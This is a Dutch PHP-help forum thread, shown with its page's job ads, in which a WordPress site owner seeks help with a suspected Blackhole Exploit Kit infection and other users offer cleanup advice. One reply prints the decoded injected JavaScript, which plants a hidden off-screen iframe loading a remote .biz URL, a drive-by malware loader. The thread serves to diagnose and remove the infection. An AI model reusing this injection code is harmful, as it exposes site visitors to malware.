Blackhole Exploit Kit

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Frontend Developer

Functieomschrijving Voor de NIPV zijn wij opzoek naar een Frontend Developer. Als Frontend Developer ga jij aan de slag om dashboards te bouwen vanuit het datawarehouse. Dit stelt NIPV in staat om snel en eenvoudig bij correcte bedrijfsvoeringsinformatie te kunnen. Je ontwikkelt dashboards in PowerBI, publiceert en onderhoud die, verzameld en verwerkt feedback in overleg met het ontwikkelteam. Naast dashboards ontwikkel en onderhoud je een datamodel in Excel waarmee adviseurs, controllers en analisten in staat worden gesteld om de gegevens uit de dashboards te raadplegen en anders te filteren of bepaalde gegevens nader te verfijnen, zodat verdiepende vragen kunnen worden

Bekijk vacature »

Full stack .NET developer Microsoft 365

Wat ga je doen als Full stack .NET developer Microsoft 365? Je stelt je op als sparringpartner voor het team en PO over toekomstige functionaliteiten, architectuur en mogelijke nieuwe producten. Je bent mede-verantwoordelijk voor het vertalen en omzetten van een user story in een passend technisch design. Je implementeert functionaliteiten op basis van een technisch design en user story. Je bent mede-verantwoordelijk voor het beheer van Azure DevOps, waaronder het beheer van GIT, Build Pipelines, Release Pipelines en geautomatiseerde testen. Hier herken jij jezelf in Hbo werk- en denkniveau of hoger aangevuld met relevante certificeringen en/of cursussen; Minimaal 3 jaar

Bekijk vacature »

OutSystems developer

Dit ga je doen Klanten adviseren over de mogelijkheden van OutSystems; OutSystems oplossingen ontwikkelen en implementeren; Stakeholdermanagement; Kennis en expertise up to date houden en delen met het team. Hier ga je werken Onze opdrachtgever, gevestigd in regio Amsterdam, is een innovatieve dienstverlener die zich richt op grote corporates in verschillende sectoren. Doordat je bij veel verschillende klanten aan de slag zal gaan is geen enkel project hetzelfde. De organisatie kenmerkt zich door hoge mate van professionaliteit en innovatieve oplossingen. In de rol van OutSystems developer zal jij verschillende grote klanten helpen om efficiënte OutSystems oplossingen te ontwikkelen en implementeren.

Bekijk vacature »

Front-End Developer

Als Front-End Developer bij Coolblue verbeter je de gebruiksvriendelijkheid van onze webshop voor miljoenen klanten. Wat doe je als Front-End Developer bij Coolblue? Als Front-end Developer werk je aan de gebruiksvriendelijkheid van onze webshop voor miljoenen klanten. Je vindt het leuk om samen te werken met de UX designer om stories op te pakken. Je krijgt energie van het bedenken van creatieve oplossingen en presenteert dit graag binnen het team. Daarnaast ben je trots op je werk en verwelkomt alle feedback. Ook Front-end Developer worden bij Coolblue? Lees hieronder of het bij je past. Dit vind je leuk om te

Bekijk vacature »

Senior front-end developer (React)

Functie Momenteel zijn ze op zoek naar een ervaren front-end developer. Als senior werk je nauw samen met 5 collega developers. Een klein scrum team dus, met korte lijnen waardoor jouw ideeën snel tot uitvoering gebracht kunnen worden. De huidige applicaties worden veelal ontwikkeld met o.a. React, Redux, TypeScript. Ze zijn echt op zoek naar een kartrekker in het team. Naast het meedenken over, opzetten en uitvoeren van bijvoorbeeld de architectuur of toepassing van nieuwe technieken krijg je ook veel tijd om de meer junior (front-end) developers te begeleiden. Hierin nemen ze graag de tijd om mensen de ruimte te

Bekijk vacature »

Java developer

Als Java Developer bij Sogeti ben je onderdeel van onze toonaangevende community die bestaat uit ruim 100 gepassioneerde professionals. In teamverband lever je mooie prestaties. Daarmee draag je aan bij de meerwaarde die wij leveren aan onze klanten. Geen werkdag is hetzelfde, je bent voortdurend bezig met het oplossen van allerlei complexe vraagstukken binnen bedrijfskritische systemen. Een voorbeeld hiervan is een cliënt-volgsysteem bij Reclassering Nederland. Andere klanten waar wij onder andere voor werken: KPN, Philips, Nationale-Nederlanden, Kamer van Koophandel, ABN AMRO, Bovemij, Arval en de Politie. Werken bij Sogeti Nieuwe ontwikkelingen volgen we op de voet en delen we binnen de

Bekijk vacature »

Back end developer Python, PHP

Functie Jij als full stack ontwikkelaar zult komen te werken samen met 1 PHP ontwikkelaar een PO en een flexibele schil aan ontwikkelaars . Samen ga je ervoor zorgen dat de huidige producten doorontwikkeld worden. De marketplace is geschreven in PHP Laravel en in de front end React. De roostersoftware is ontwikkeld in Python in combinatie met React in de front end. Jij zult voornamelijk (lees 75%) werken aan de roostersoftware. Momenteel ligt de uitdaging in het feit dat de roostersoftware breder schaalbaar moet worden zodat het voor meerdere flexwerkers ingezet kan worden. Verder willen ze financiële koppelingen gaan maken

Bekijk vacature »

C#.NET Developer Jr. Functie

Functie omschrijving Bouw jij graag aan applicaties om processen in distributiecentra te optimaliseren? Wij zijn op zoek naar een C#.NET ontwikkelaar in regio Breda die hier graag een steentje aan bijdraagt! Jouw werkzaamheden zullen er als volgt uitzien: Je krijgt veel vrijheid in de keuze van de technieken die je gaat gebruiken. Uiteraard wel binnen de gestelde kaders, en door gebruik te maken van het .NET platform. Je gaat aan de slag met de ontwikkeling van een nieuwe module binnen de WMS suite van dit bedrijf. Deze "carrier" module gaat er voor zorgen dat de selectie van een vervoerder volledig

Bekijk vacature »

Backend Developer Scrummaster .NET

Samengevat: Deze werkgever is een ambitieus internetbedrijf met een passie voor digitale communicatie. Ben jij geschikt als Backend Developer? Heb je ervaring met .NET platform? Vaste baan: Backend Developer / SCRUM Master Scrum HBO WO €3.800 - €6.000 Deze werkgever is een innovatief bedrijf met enthousiaste mensen die jarenlang ervaring hebben met het ontwikkelen internet- en intranetoplossingen. Wij houden van korte lijnen en open en eerlijke communicatie. Wij zetten graag onze jarenlange ervaring in om perfect werkende oplossingen te ontwikkelen. Wij ondersteunen dienstverlenende organisaties bij het ontwikkelen en realiseren van een effectief, adaptief communicatieplatform. Je ontwikkelt met ons de meest

Bekijk vacature »

Medior Java developer (fullstack)

Wat je gaat doen: Of beter nog, wat wil jij doen? Binnen DPA GEOS zijn we dan ook op zoek naar enthousiaste Java developers om ons development team te versterken. Als Java developer werk je in Agile/Scrum teams bij onze klanten en daarbij kun je eventueel ook andere ontwikkelaars begeleiden in het softwareontwikkelproces. Verder draag je positief bij aan de teamgeest binnen een projectteam en je kijkt verder dan je eigen rol. Je gaat software maken voor verschillende opdrachtgevers in jouw regio. Je bent een professional die het IT-vak serieus neemt en kwaliteit levert. Je leert snel vanwege je diepgaande

Bekijk vacature »

Java developer

Functie Je gaat aan de slag als Tester voor een aantal mooie projecten. Je komt terecht in een DevOps team waar jij aan de slag gaat om de kwaliteit te waarborgen omtrent de maatwerk software voor de klanten. Je draait je hand er niet voor om de adviserende rol te bekleden op het gebied van testautomatisering en het opzetten van testframeworks. Zoals aangegeven ga je daadwerkelijk in het eigen team aan de slag en is het daarnaast ook gebruikelijk bij de klanten op locatie te komen om te werken aan de opdrachten. Je krijgt zodoende echt een mooie kijk in

Bekijk vacature »

Junior .NET developer

Functie Wij hebben drie scrumteams. Het eerste team focust zich op het stukje hardware wat wij in huis doen. Zij maken als team o.a. gebruik van C++. De andere twee scrumteams zijn allebei bezig met data verwerking en maken hierbij in de backend gebruik van C# .NET / .NET Core. Het verschil tussen deze teams is dat één team de data verwerking doet voor de mobiele applicatie. Zij werken hierbij dus ook met Xamarin. Het andere team focust zich op de webapplicaties en maakt hierbij ook gebruik van ASP.NET MVC. Op basis van jouw ambities en kwaliteiten kijken wij samen

Bekijk vacature »

Junior .NET developer

Functie Als junior .NET ontwikkelaar start jij in ons development team met twee andere .NET developers. Als team werken jullie in scrum en is er iedere ochtend om 11.00 een standup. Jij krijgt als junior .NET ontwikkelaar een inwerk traject dat echt specifiek wordt ingericht op basis van wat jij nodig hebt. Een van de grootste pluspunten bij ons is dat wij binnen ons bedrijf veel (technische) vrijheid geven en juist eigen initiatieven erg stimuleren. Jouw werkzaamheden gaan er bij ons als volgt uit zien: – Het ontwikkelen van nieuwe software samen met interne en eventueel externe ontwikkelaars; – Het

Bekijk vacature »

Software Developer

Bij een bedrijf in de machinebouw, regio Roosendaal, zijn we op zoek naar een: Software Developer Waar ga je werken? Onze opdrachtgever is gespecialiseerd in de grondverzetmachines. Al meer dan 50 jaar leveren ze zowel nationaal als internationaal diverse machines. Het is een familiebedrijf met een informele werksfeer. Wat ga je doen? Als Software Developer je verantwoordelijk voor: - Je werkt voortdurend aan oplossingen voor het op afstand bewaken en besturen van oogstmachines; - Het visualiseren van gegevens in rapporten, apps of andere formaten; - Voorspellend machineonderhoud; - Taakplanning; - Je schrijft aangepaste plug-ins om gegevens te importeren of exporteren

Bekijk vacature »

Ervaren PHP Software Developer

Functieomschrijving Voor een toffe opdrachtgever in regio Breda zijn wij op zoek naar een medior PHP Developer met affiniteit met Laravel. Je komt te werken bij een uitdagende opdrachtgever met supergave klanten in een specifieke branche. Als PHP ontwikkelaar ben je samen met een vooruitstrevende team van 6 collega’s verantwoordelijk voor de ontwikkeling, beheer en het vernieuwen van informatiesystemen voor een specifieke branche. Je ondersteunt complexe uitdagingen van klanten. Vervolgens breng je hun wensen in kaart en vertaalt deze door naar maatwerk software. Affiniteit met Laravel is een pré. Om de klanten zo goed mogelijk te ondersteunen en snel in

Bekijk vacature »
Brainworx CC

Brainworx CC

14/03/2013 11:56:02
Quote Anchor link
Beste,

Ik heb denk ik last van een Blackhole Exploit Kit op mijn website.

Configuratie:
- WP 3.5.1
- Up2date plugins
- Premium theme *betaald

Ik heb diverse malen de .php bestanden doorzocht op een code die wijst naar een mogelijke oorzaak. Helaas zonder resultaat. Ik krijg zelf (en sommige bezoekers) met diverse antivirus guards zo nu en dan meldingen, van eem mogelijke dreiging.

Sucuri: OK?

web site: *url verwijderd ivm veiligheid*
status: Verified Clean
web trust: Not Blacklisted
*Cached results from a few minutes ago.

Security report (No threats found):
check Blacklisted: No
check Malware: No
check Malicious javascript: No
check Malicious iFrames: No
check Drive-By Downloads: No
check Anomaly detection: No
check IE-only attacks: No
check Suspicious redirections: No
check Spam: No

AVG: NOK?

*url verwijderd ivm veiligheid*

Kan iemand mij hierbij helpen informeren. Heb reeds de SQL en WP installatie eenmaal volledig opnieuw geinstalleerd. Dus waar dit precies ontstaat is mij geheel onduidelijk. Wellich in een file op de ftp dat geen .php is?
Gewijzigd op 24/05/2013 14:21:44 door Bas IJzelendoorn
 
PHP hulp

PHP hulp

19/04/2024 05:47:12
 
TJVB tvb

TJVB tvb

14/03/2013 12:00:53
Quote Anchor link
Heb je alle bestanden gedownload (via ftp) en met een virusscanner gescand?
 
Marvin H

Marvin H

14/03/2013 12:02:39
Quote Anchor link
Het zou ook kunnen zijn dat de hosting provider zelf is gehacked, zit je op shared hosting?
Controleer eens op bestanden die recentelijk gewijzigd zijn en check je logboeken op rare events (indien je hier toegang tot hebt)...

Toevoeging op 14/03/2013 12:07:58:

Ik zie trouwens in je broncode een raar script staan, het ziet ernaar uit dat je php files zijn aangepast...
Ik kan je wel helpen met alles te checken, stuur me anders even een PM

code verwijderd om exploit te voorkomen
Gewijzigd op 24/05/2013 15:19:03 door Joren de Wit
 
Brainworx CC

Brainworx CC

14/03/2013 12:10:44
Quote Anchor link
@TJVB, done en geen gevonden object.

@Marvin, die 1e line zie ik zelf nergens staan :S ik PM je even!
 
Marvin H

Marvin H

14/03/2013 12:14:12
Quote Anchor link
Bovenstaande 'hash' is de volgende HTML code... Duidelijk een injectie in je PHP dus...

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
        if (document.getElementsByTagName('body')[0]){
            iframer();
        } else {
            document.write("<iframe src='http://.....biz/tmpfile/node/questions.php?topnav=42&soft=633&oracle=79&virus=719&contests=730' width='100' height='100' style='width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
        }
        function iframer(){
            var f = document.createElement('iframe');f.setAttribute('src','http://......biz/tmpfile/node/questions.php?topnav=42&soft=633&oracle=79&virus=719&contests=730');f.style.left='-10000px';f.style.visibility='hidden';f.style.top='0';f.style.position='absolute';f.style.top='0';f.setAttribute('width','100');f.setAttribute('height','100');
            document.getElementsByTagName('body')[0].appendChild(f);
        }
Gewijzigd op 24/05/2013 15:16:02 door Joren de Wit
 
Brainworx CC

Brainworx CC

24/05/2013 11:59:31
Quote Anchor link
Mensen,

Ik heb echt even hulp nodig nu... heb er diverse malen nu naar gekeken, maar alsnog geeft hij weer meldingen.

http://imgur.com/ucekepZ

Iemand die de broncode in WP kan na kijken voor me?
 
Bas IJzelendoorn

Bas IJzelendoorn

24/05/2013 15:25:56
Quote Anchor link
Voor de zekerheid heb ik 2 urls en gevaarlijke code verwijderd. Gezien hier bij mij me virusscanner en de spyware scanner begonnen te protesteren bij het openen van de pagina (op phphulp). Graag het verzoek even goed opletten met welke code er geplaatst wordt en geen gevaarlijke code hier te plaatsen.[/modedit]
 
Brainworx CC

Brainworx CC

24/05/2013 15:41:48
Quote Anchor link
Maar Bas ... is er ook iemand die mij kan helpen?
 
TJVB tvb

TJVB tvb

24/05/2013 15:50:17
Quote Anchor link
Heb je alles (ook verborgen bestanden) weggehaald en Word Press geheel opnieuw geïnstalleerd?
Alle wachtwoorden aangepast?
En heb je ook de access logs na kunnen kijken?

Eventueel wil ik er wel naar kijken (pm me dan de details) maar dat zal pas volgende week gebeuren.
 
Eddy E

Eddy E

24/05/2013 21:06:40
Quote Anchor link
Inderdaad, buiten WP om even een backup van je database maken (via PHPmyAdmin oid).
Dan alles verwijderen, WP nieuw erop zetten (van schone installatie) en dan database terug zetten.

Is misschien de enige manier.
En uiteraard dit aangeven bij WP, zodat ze het gat kunnen dichten.
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.